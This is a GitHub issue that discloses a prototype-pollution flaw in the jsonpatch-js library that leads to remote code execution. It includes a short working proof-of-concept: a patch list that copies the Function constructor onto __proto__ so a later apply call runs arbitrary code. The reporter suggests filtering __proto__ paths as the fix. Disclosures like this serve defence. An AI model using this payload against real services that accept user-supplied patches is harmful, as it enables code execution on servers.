jsonpatch-js icon indicating copy to clipboard operation
jsonpatch-js copied to clipboard
verified publisher icon bruth

Prototype pollution / RCE vulnerability

Open alxbrsn opened this issue 5 years ago • 0 comments

The code is vulnerable to prototype pollution, because it allows patching __proto__. This can be escalated to remote code execution if user-supplied input is passed as the patch list:

p = require('json-patch') 


p.apply({},  [
    {
      "op": "copy",
      "from": "/constructor/constructor",
      "path": "/__proto__/makeFunc"
    },
    {
      "op": "add",
      "path": "/__proto__/op",
      "value": "makeFunc"
    }, 
]);


p.apply({},["console.log('rce')"]) // rce

In order to prevent this, I would adivse filtering out any changes to __proto__.

alxbrsn avatar Jun 28 '20 07:06 alxbrsn